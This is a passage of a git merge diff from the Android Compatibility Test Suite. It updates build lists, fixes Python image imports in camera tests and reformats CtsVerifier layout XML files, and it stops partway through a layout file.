Merge "Merge "Merge "DO NOT MERGE: Test for potential overflow in Visualizer effect" into marshmallow-cts-dev am: 8dd5b853c4 -s ours" into nougat-cts-dev am: ab385cc2ee -s ours" into nougat-mr1-cts-dev
am: 4edb097813 -s ours
Change-Id: I3105842e948be681bff1a73755d96d98691e9aad
diff --git a/.gitignore b/.gitignore
index 07a80d6..dbd5bcf 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,3 +7,5 @@
/bin
.idea/*
.idea/
+gen/
+*.iml
diff --git a/OldCtsTestCaseList.mk b/OldCtsTestCaseList.mk
index 685d9a0..c54d283 100644
--- a/OldCtsTestCaseList.mk
+++ b/OldCtsTestCaseList.mk
@@ -15,9 +15,11 @@
cts_security_apps_list := \
CtsAppAccessData \
CtsAppWithData \
+ CtsDeclareNonRuntimePermissions \
CtsDocumentProvider \
CtsDocumentClient \
CtsEncryptionApp \
+ CtsEscalateToRuntimePermissions \
CtsExternalStorageApp \
CtsInstrumentationAppDiffCert \
CtsNetSecPolicyUsesCleartextTrafficFalse \
diff --git a/apps/CameraITS/pymodules/its/image.py b/apps/CameraITS/pymodules/its/image.py
index 0057eb7..4b06d96 100644
--- a/apps/CameraITS/pymodules/its/image.py
+++ b/apps/CameraITS/pymodules/its/image.py
@@ -18,7 +18,7 @@
import its.error
import pylab
import sys
-import Image
+from PIL import Image
import numpy
import math
import unittest
diff --git a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
index e86ebd2..4f6aed8 100644
--- a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
+++ b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
@@ -21,7 +21,6 @@
import matplotlib
import matplotlib.pyplot as plt
import math
-import Image
import time
import numpy as np
import scipy.stats
@@ -155,7 +154,7 @@
np.var(tile(hp, tile_size), axis=(0, 1)).flatten()
for (mean, var) in zip(means_tiled, vars_tiled):
- # Don't include the tile if it has samples that might
+ # Don't include the tile if it has samples that might
# be clipped.
if mean + 2*math.sqrt(var) < max_signal_level:
samples_e.append([mean, var])
@@ -173,7 +172,7 @@
samples.extend([(round(s), mean, var) for (mean, var) in samples_s])
# Add the linear fit to the plot for this sensitivity.
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
label="Linear fit")
xmax = max([x for (x, _) in samples_s])*1.25
plt_s.set_xlim(xmin=0, xmax=xmax)
@@ -217,7 +216,7 @@
[A, B, C, D], _, _, _ = np.linalg.lstsq(a, b)
- # Plot the noise model components with the values predicted by the
+ # Plot the noise model components with the values predicted by the
# noise model.
S_model = A*sens + B
O_model = \
@@ -226,14 +225,14 @@
(fig, (plt_S, plt_O)) = plt.subplots(2, 1)
plt_S.set_title("Noise model")
plt_S.set_ylabel("S")
- plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
+ plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_S.loglog(sens, S_model, 'bx', basex=10, basey=10, label="Model")
plt_S.legend(loc=2)
plt_O.set_xlabel("ISO")
plt_O.set_ylabel("O")
- plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
+ plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_O.loglog(sens, O_model, 'bx', basex=10, basey=10, label="Model")
fig.savefig("%s.png" % (NAME))
@@ -244,7 +243,7 @@
dg = max(s/sens_max_analog, 1)
S = A*s + B
O = C*s*s + D*dg*dg
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
label="Model")
plt_s.legend(loc=2)
diff --git a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
index 288d6e4..bbd1417 100644
--- a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
+++ b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
@@ -23,7 +23,7 @@
import matplotlib
import matplotlib.pyplot
import json
-import Image
+from PIL import Image
import numpy
import cv2
import bisect
diff --git a/apps/CtsVerifier/Android.mk b/apps/CtsVerifier/Android.mk
index 304c982..cafb855 100644
--- a/apps/CtsVerifier/Android.mk
+++ b/apps/CtsVerifier/Android.mk
@@ -26,7 +26,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src) $(call all-Iaidl-files-under, src)
LOCAL_STATIC_JAVA_LIBRARIES := android-ex-camera2 \
- android-support-v4 \
compatibility-common-util-devicesidelib \
cts-sensors-tests \
cts-location-tests \
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index af9336b..c28b2a5 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="7.1_r3">
+ android:versionName="7.1_r201703s">
<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="25"/>
diff --git a/apps/CtsVerifier/res/layout-round/provisioning_byod.xml b/apps/CtsVerifier/res/layout-round/provisioning_byod.xml
new file mode 100644
index 0000000..d2b6e0e
--- /dev/null
+++ b/apps/CtsVerifier/res/layout-round/provisioning_byod.xml
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<android.support.v4.widget.NestedScrollView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/main_layout"
+ style="@style/RootLayoutPadding"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+
+ <LinearLayout
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <TextView
+ android:id="@+id/test_instructions"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:padding="10dip"/>
+ <Button
+ android:id="@+id/prepare_test_button"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"/>
+ <ListView
+ android:id="@+id/android:list"
+ android:layout_width="match_parent"
+ android:layout_height="0dip"
+ android:layout_weight="3"/>
+ <include layout="@layout/pass_fail_buttons"/>
+ </LinearLayout>
+</android.support.v4.widget.NestedScrollView>
diff --git a/apps/CtsVerifier/res/layout-small/policy_transparency_test.xml b/apps/CtsVerifier/res/layout-small/policy_transparency_test.xml
index 40c1ad3..1c5e448 100644
--- a/apps/CtsVerifier/res/layout-small/policy_transparency_test.xml
+++ b/apps/CtsVerifier/res/layout-small/policy_transparency_test.xml
@@ -14,75 +14,69 @@
limitations under the License.
-->
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
- android:id="@+id/root_view"
- style="@style/RootLayoutPadding"
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:descendantFocusability="beforeDescendants"
- android:focusableInTouchMode="true"
- android:orientation="vertical">
- <ScrollView
+ android:id="@+id/root_view"
+ style="@style/RootLayoutPadding"
+ android:orientation="vertical"
android:layout_width="match_parent"
- android:layout_height="match_parent">
- <LinearLayout
+ android:layout_height="match_parent"
+ android:descendantFocusability="beforeDescendants"
+ android:focusableInTouchMode="true">
+ <ScrollView
android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
- <TextView
+ android:layout_height="match_parent">
+ <LinearLayout
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <TextView
android:id="@+id/test_instructions"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:textSize="12dip"/>
- <LinearLayout
+ <LinearLayout
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:orientation="vertical"
+ android:paddingTop="8dp">
+ <TextView android:id="@+id/widget_label"
android:layout_width="match_parent"
android:layout_height="wrap_content"
- android:orientation="vertical"
- android:paddingTop="8dp">
- <TextView
- android:id="@+id/widget_label"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:paddingEnd="8dp"
- android:paddingStart="16dp"
- android:textSize="12dip"/>
- <Switch
- android:id="@+id/switch_widget"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:paddingEnd="16dp"
- android:paddingStart="8dp"
- android:visibility="gone"/>
- <EditText
- android:id="@+id/edit_text_widget"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:ems="6"
- android:gravity="center"
- android:singleLine="true"
- android:visibility="gone"/>
- <Button
- android:id="@+id/update_button"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:paddingEnd="16dp"
- android:paddingStart="8dp"
- android:text="@string/policy_transparency_update_button_label"
- android:visibility="gone"/>
- <Spinner
- android:id="@+id/spinner_widget"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:visibility="gone"/>
- </LinearLayout>
-
- <Button
- android:id="@+id/open_settings_button"
+ android:textSize="12dip"
+ android:paddingStart="16dp"
+ android:paddingEnd="8dp" />
+ <Switch android:id="@+id/switch_widget"
android:layout_width="match_parent"
android:layout_height="wrap_content"
- android:text="@string/policy_transparency_open_settings_label"/>
+ android:paddingStart="8dp"
+ android:paddingEnd="16dp"
+ android:visibility="gone" />
+ <EditText android:id="@+id/edit_text_widget"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:ems="6"
+ android:singleLine="true"
+ android:gravity="center"
+ android:visibility="gone" />
+ <Button android:id="@+id/update_button"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/policy_transparency_update_button_label"
+ android:paddingStart="8dp"
+ android:paddingEnd="16dp"
+ android:visibility="gone" />
+ <Spinner android:id="@+id/spinner_widget"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:visibility="gone" />
+ </LinearLayout>
- <include layout="@layout/pass_fail_buttons"/>
- </LinearLayout>
- </ScrollView>
+ <Button android:id="@+id/open_settings_button"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:text="@string/policy_transparency_open_settings_label" />
+
+ <include layout="@layout/pass_fail_buttons"/>
+</LinearLayout>
+</ScrollView>
</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout-watch/policy_transparency_test.xml b/apps/CtsVerifier/res/layout-watch/policy_transparency_test.xml
deleted file mode 100644
index 40c1ad3..0000000
--- a/apps/CtsVerifier/res/layout-watch/policy_transparency_test.xml
+++ /dev/null
@@ -1,88 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2016 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
- android:id="@+id/root_view"
- style="@style/RootLayoutPadding"
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:descendantFocusability="beforeDescendants"
- android:focusableInTouchMode="true"
- android:orientation="vertical">
- <ScrollView
- android:layout_width="match_parent"
- android:layout_height="match_parent">
- <LinearLayout
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
- <TextView
- android:id="@+id/test_instructions"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:textSize="12dip"/>
-
- <LinearLayout
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:orientation="vertical"
- android:paddingTop="8dp">
- <TextView
- android:id="@+id/widget_label"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:paddingEnd="8dp"
- android:paddingStart="16dp"
- android:textSize="12dip"/>
- <Switch
- android:id="@+id/switch_widget"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:paddingEnd="16dp"
- android:paddingStart="8dp"
- android:visibility="gone"/>
- <EditText
- android:id="@+id/edit_text_widget"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:ems="6"
- android:gravity="center"
- android:singleLine="true"
- android:visibility="gone"/>
- <Button
- android:id="@+id/update_button"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:paddingEnd="16dp"
- android:paddingStart="8dp"
- android:text="@string/policy_transparency_update_button_label"
- android:visibility="gone"/>
- <Spinner
- android:id="@+id/spinner_widget"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:visibility="gone"/>
- </LinearLayout>
-
- <Button
- android:id="@+id/open_settings_button"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/policy_transparency_open_settings_label"/>
-
- <include layout="@layout/pass_fail_buttons"/>
- </LinearLayout>
- </ScrollView>
-</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout-watch/policy_transparency_test_list.xml b/apps/CtsVerifier/res/layout-watch/policy_transparency_test_list.xml
deleted file mode 100644
index 0835cb1..0000000
--- a/apps/CtsVerifier/res/layout-watch/policy_transparency_test_list.xml
+++ /dev/null
@@ -1,63 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2016 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<com.android.cts.verifier.BoxInsetLayout xmlns:android="http://schemas.android.com/apk/res/android"
- xmlns:app="http://schemas.android.com/apk/res-auto"
- style="@style/RootLayoutPadding"
- android:layout_width="match_parent"
- android:layout_height="match_parent">
-
-<ScrollView
- android:layout_width="match_parent"
- android:layout_height="match_parent">
- <LinearLayout app:ctsv_layout_box="all"
- android:orientation="vertical"
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- >
-
- <ListView android:id="@id/android:list"
- android:layout_width="match_parent"
- android:layout_height="1000dip"
- android:layout_marginTop="10dip"
- android:layout_marginBottom="10dip"
- />
-
- <TextView android:id="@id/android:empty"
- android:layout_width="match_parent"
- android:layout_height="8dip"
- />
-
- <LinearLayout
- android:layout_width="match_parent"
- android:layout_height="wrap_content">
- <Button android:id="@+id/short_msg_button"
- android:layout_width="0dp"
- android:layout_height="wrap_content"
- android:layout_weight="1"
- android:textSize="8dip"
- android:text="@string/policy_transparency_short_support_msg_label" />
- <Button android:id="@+id/long_msg_button"
- android:layout_width="0dp"
- android:layout_height="wrap_content"
- android:layout_weight="1"
- android:textSize="8dip"
- android:text="@string/policy_transparency_long_support_msg_label" />
- </LinearLayout>
- <include layout="@layout/pass_fail_buttons" />
-
- </LinearLayout>
-</ScrollView>
-</com.android.cts.verifier.BoxInsetLayout>
diff --git a/apps/CtsVerifier/res/layout-watch/positive_device_owner.xml b/apps/CtsVerifier/res/layout-watch/positive_device_owner.xml
deleted file mode 100644
index 82f11a2..0000000
--- a/apps/CtsVerifier/res/layout-watch/positive_device_owner.xml
+++ /dev/null
@@ -1,50 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2015 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
- style="@style/RootLayoutPadding"
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
-
- <ScrollView
- android:layout_width="match_parent"
- android:layout_height="match_parent">
- <LinearLayout
- android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
-
- <TextView
- android:id="@+id/positive_device_owner_instructions"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/device_owner_positive_tests_instructions"
- android:textSize="16dip" />
-
- <Button
- android:id="@+id/set_device_owner_button"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/set_device_owner_button_label" />
-
- <ListView
- android:id="@+id/android:list"
- android:layout_width="match_parent"
- android:layout_height="800dip" />
-
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
- </ScrollView>
-</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/bt_toggle.xml b/apps/CtsVerifier/res/layout/bt_toggle.xml
index c592c78..e3c00b7 100644
--- a/apps/CtsVerifier/res/layout/bt_toggle.xml
+++ b/apps/CtsVerifier/res/layout/bt_toggle.xml
@@ -13,30 +13,29 @@
limitations under the License.
-->
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <TextView
+ style="@style/InstructionsFont"
android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical"
- style="@style/RootLayoutPadding">
- <TextView android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:layout_alignParentTop="true"
- android:gravity="center"
- android:text="@string/bt_toggle_instructions"
- style="@style/InstructionsFont"
- />
+ android:layout_height="wrap_content"
+ android:layout_alignParentTop="true"
+ android:gravity="center"
+ android:text="@string/bt_toggle_instructions" />
- <ToggleButton android:id="@+id/bt_toggle_button"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_centerInParent="true"
- android:textOn="@string/bt_disable_bluetooth"
- android:textOff="@string/bt_enable_bluetooth"
- />
-
- <include android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:layout_alignParentBottom="true"
- layout="@layout/pass_fail_buttons"
- />
+ <ToggleButton
+ android:id="@+id/bt_toggle_button"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_centerInParent="true"
+ android:textOff="@string/bt_enable_bluetooth"
+ android:textOn="@string/bt_disable_bluetooth" />
+
+ <include
+ layout="@layout/pass_fail_buttons"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_alignParentBottom="true" />
</RelativeLayout>
diff --git a/apps/CtsVerifier/res/layout/intent_driven_test.xml b/apps/CtsVerifier/res/layout/intent_driven_test.xml
index dbb54c9..794a6d6 100644
--- a/apps/CtsVerifier/res/layout/intent_driven_test.xml
+++ b/apps/CtsVerifier/res/layout/intent_driven_test.xml
@@ -1,36 +1,32 @@
<?xml version="1.0" encoding="utf-8"?>
-<com.android.cts.verifier.BoxInsetLayout xmlns:android="http://schemas.android.com/apk/res/android"
- xmlns:app="http://schemas.android.com/apk/res-auto"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
- android:layout_height="match_parent">
- <LinearLayout app:ctsv_layout_box="all"
+ android:layout_height="match_parent"
+ android:orientation="vertical"
+ style="@style/RootLayoutPadding">
+
+ <ScrollView
android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
-
- <ScrollView
+ android:layout_height="0dp"
+ android:layout_weight="1">
+ <TextView android:id="@+id/info"
android:layout_width="match_parent"
- android:layout_height="0dp"
- android:layout_weight="1">
- <TextView android:id="@+id/info"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:textSize="18sp"
- android:padding="5dp"
- android:text="@string/dc_start_alarm_test_info"/>
- </ScrollView>
+ android:layout_height="wrap_content"
+ android:textSize="18sp"
+ android:padding="5dp"
+ android:text="@string/dc_start_alarm_test_info"/>
+ </ScrollView>
- <LinearLayout android:id="@+id/buttons"
- android:orientation="horizontal"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"/>
+ <LinearLayout android:id="@+id/buttons"
+ android:orientation="horizontal"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"/>
- <LinearLayout
- android:layout_width="match_parent"
- android:layout_height="wrap_content">
+ <LinearLayout
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content">
- <include layout="@layout/pass_fail_buttons"/>
- </LinearLayout>
+ <include layout="@layout/pass_fail_buttons"/>
</LinearLayout>
-</com.android.cts.verifier.BoxInsetLayout>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/js_charging.xml b/apps/CtsVerifier/res/layout/js_charging.xml
index 104b9ab..306d02d 100644
--- a/apps/CtsVerifier/res/layout/js_charging.xml
+++ b/apps/CtsVerifier/res/layout/js_charging.xml
@@ -1,4 +1,5 @@
-<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2016 The Android Open Source Project
+<?xml version="1.0" encoding="utf-8"?><!--
+ Copyright (C) 2016 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
@@ -12,98 +13,102 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
style="@style/RootLayoutPadding"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
- <LinearLayout
- android:orientation="vertical"
+ <ScrollView
android:layout_width="match_parent"
android:layout_height="match_parent">
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/js_test_description"
- android:layout_margin="@dimen/js_padding"/>
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:layout_margin="@dimen/js_padding"
- android:text="@string/js_charging_description_1"
- android:textStyle="bold"/>
- <Button
- android:id="@+id/js_charging_start_test_button"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_gravity="center"
- android:text="@string/js_start_test_text"
- android:onClick="startTest"
- android:enabled="false"/>
- <TextView
- android:id="@+id/js_waiting_for_charging_text_view"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:layout_margin="@dimen/js_padding"
- android:text="@string/js_charging_description_3"
- android:textStyle="bold"
- android:visibility="gone"/>
- <com.android.cts.verifier.TimerProgressBar
- android:id="@+id/js_waiting_for_charging_progress_bar"
- style="?android:attr/progressBarStyleHorizontal"
- android:layout_width="fill_parent"
- android:layout_height="wrap_content"
- android:layout_margin="@dimen/js_padding"
- android:visibility="gone"/>
- <TextView
- android:id="@+id/js_problem_with_charger_text_view"
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:layout_margin="@dimen/js_padding"
- android:text="@string/js_charging_description_4"
- android:textStyle="bold"
- android:visibility="gone"/>
<LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
- android:id="@+id/charging_on_test_image"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
- <TextView
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:text="@string/js_charging_on_test"
- android:textSize="16dp"/>
- </LinearLayout>
- <TextView
android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:layout_margin="@dimen/js_padding"
- android:text="@string/js_charging_description_2"
- android:textStyle="bold"/>
- <LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
- android:id="@+id/charging_off_test_image"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
+ android:layout_height="match_parent"
+ android:orientation="vertical">
<TextView
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_test_description"/>
+ <TextView
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_charging_description_1"
+ android:textStyle="bold"/>
+ <Button
+ android:id="@+id/js_charging_start_test_button"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
- android:text="@string/js_charging_off_test"
- android:textSize="16dp"/>
+ android:layout_gravity="center"
+ android:enabled="false"
+ android:onClick="startTest"
+ android:text="@string/js_start_test_text"/>
+ <TextView
+ android:id="@+id/js_waiting_for_charging_text_view"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_charging_description_3"
+ android:textStyle="bold"
+ android:visibility="gone"/>
+ <com.android.cts.verifier.TimerProgressBar
+ android:id="@+id/js_waiting_for_charging_progress_bar"
+ style="?android:attr/progressBarStyleHorizontal"
+ android:layout_width="fill_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:visibility="gone"/>
+ <TextView
+ android:id="@+id/js_problem_with_charger_text_view"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_charging_description_4"
+ android:textStyle="bold"
+ android:visibility="gone"/>
+ <LinearLayout
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/charging_on_test_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_charging_on_test"
+ android:textSize="16dp"/>
+ </LinearLayout>
+ <TextView
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_charging_description_2"
+ android:textStyle="bold"/>
+ <LinearLayout
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginBottom="@dimen/js_padding"
+ android:layout_marginTop="@dimen/js_padding">
+ <ImageView
+ android:id="@+id/charging_off_test_image"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:layout_marginRight="@dimen/js_padding"
+ android:src="@drawable/fs_indeterminate"/>
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/js_charging_off_test"
+ android:textSize="16dp"/>
+ </LinearLayout>
+ <include layout="@layout/pass_fail_buttons"/>
</LinearLayout>
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
-</ScrollView>
+ </ScrollView>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/js_connectivity.xml b/apps/CtsVerifier/res/layout/js_connectivity.xml
index 981d444..923d19e 100644
--- a/apps/CtsVerifier/res/layout/js_connectivity.xml
+++ b/apps/CtsVerifier/res/layout/js_connectivity.xml
@@ -1,4 +1,5 @@
-<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2016 The Android Open Source Project
+<?xml version="1.0" encoding="utf-8"?><!--
+ Copyright (C) 2016 The Android Open Source Project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
@@ -12,91 +13,94 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-<ScrollView
- xmlns:android="http://schemas.android.com/apk/res/android"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
style="@style/RootLayoutPadding"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:orientation="vertical">
- <LinearLayout
- android:orientation="vertical" android:layout_width="match_parent"
+ <ScrollView
+ android:layout_width="match_parent"
android:layout_height="match_parent">
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/js_test_description"
- android:layout_margin="@dimen/js_padding"/>
-
- <TextView
- android:layout_width="match_parent"
- android:layout_height="wrap_content"
- android:text="@string/js_connectivity_description_1"
- android:layout_margin="@dimen/js_padding"
- android:textStyle="bold"/>
-
- <Button
- android:id="@+id/js_connectivity_start_test_button"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_gravity="center"
- android:text="@string/js_start_test_text"
- android:onClick="startTest"
- android:enabled="false"/>
-
<LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
- android:id="@+id/connectivity_off_test_unmetered_image"
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:src="@drawable/fs_indeterminate"
- android:layout_marginRight="@dimen/js_padding"/>
+ android:layout_width="match_parent" android:layout_height="match_parent"
+ android:orientation="vertical">
<TextView
- android:layout_width="wrap_content"
+ android:layout_width="match_parent"
android:layout_height="wrap_content"
- android:text="@string/js_unmetered_connectivity_test"
- android:textSize="16dp"/>
- </LinearLayout>
+ android:layout_margin="@dimen/js_padding"
+ android:text="@string/js_test_description"/>
- <LinearLayout
- android:layout_width="wrap_content"
- android:layout_height="wrap_content"
- android:layout_marginTop="@dimen/js_padding"
- android:layout_marginBottom="@dimen/js_padding">
- <ImageView
